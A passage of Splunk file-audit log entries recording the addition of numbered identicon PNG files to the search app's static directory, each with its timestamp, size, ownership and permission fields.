mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.913, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/230.png", isdir=0, size=290, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.907, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/23.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.903, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/229.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.899, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/228.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.895, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/227.png", isdir=0, size=408, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.891, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/226.png", isdir=0, size=311, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.887, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/225.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.883, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/224.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.879, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/223.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.875, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/222.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.871, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/221.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.867, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/220.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.861, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/22.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.857, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/219.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.852, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/218.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.849, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/217.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.845, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/216.png", isdir=0, size=399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.841, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/215.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.838, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/214.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.834, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/213.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.830, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/212.png", isdir=0, size=410, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.826, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/211.png", isdir=0, size=311, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.822, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/210.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.818, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/21.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.813, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/209.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.808, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/208.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.804, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/207.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.800, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/206.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.795, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/205.png", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.790, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/204.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.786, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/203.png", isdir=0, size=316, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.782, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/202.png", isdir=0, size=319, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.778, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/201.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.773, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/200.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.769, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/20.png", isdir=0, size=303, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.765, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/2.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.760, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/199.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.756, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/198.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.752, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/197.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.748, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/196.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.744, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/195.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.740, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/194.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.737, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/193.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.733, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/192.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.729, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/191.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.723, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/190.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.719, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/19.png", isdir=0, size=277, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.715, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/189.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.711, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/188.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.705, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/187.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.701, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/186.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.697, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/185.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.694, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/184.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.689, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/183.png", isdir=0, size=285, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.685, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/182.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.682, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/181.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.678, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/180.png", isdir=0, size=408, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.674, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/18.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.670, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/179.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.666, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/178.png", isdir=0, size=334, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.663, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/177.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.660, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/176.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.656, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/175.png", isdir=0, size=351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.653, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/174.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.649, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/173.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.645, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/172.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.641, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/171.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.637, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/170.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.634, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/17.png", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.630, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/169.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.627, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/168.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.623, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/167.png", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.618, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/166.png", isdir=0, size=288, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.613, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/165.png", isdir=0, size=257, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.608, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/164.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.603, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/163.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.599, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/162.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.595, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/161.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.589, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/160.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.585, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/16.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.581, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/159.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.577, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/158.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.573, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/157.png", isdir=0, size=272, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.569, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/156.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.565, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/155.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.562, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/154.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.558, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/153.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.553, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/152.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.549, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/151.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.545, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/150.png", isdir=0, size=284, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.541, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/15.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.538, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/149.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.532, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/148.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.528, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/147.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.523, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/146.png", isdir=0, size=314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.519, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/145.png", isdir=0, size=398, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.514, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/144.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.509, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/143.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.503, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/142.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.498, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/141.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.493, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/140.png", isdir=0, size=393, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.489, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/14.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.483, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/139.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.479, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/138.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.475, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/137.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.470, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/136.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.465, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/135.png", isdir=0, size=286, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.461, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/134.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.457, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/133.png", isdir=0, size=264, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.453, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/132.png", isdir=0, size=399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.447, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/131.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.443, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/130.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.439, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/13.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.434, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/129.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.430, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/128.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.425, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/127.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.421, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/126.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.418, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/125.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.414, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/124.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.411, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/123.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.407, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/122.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.403, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/121.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 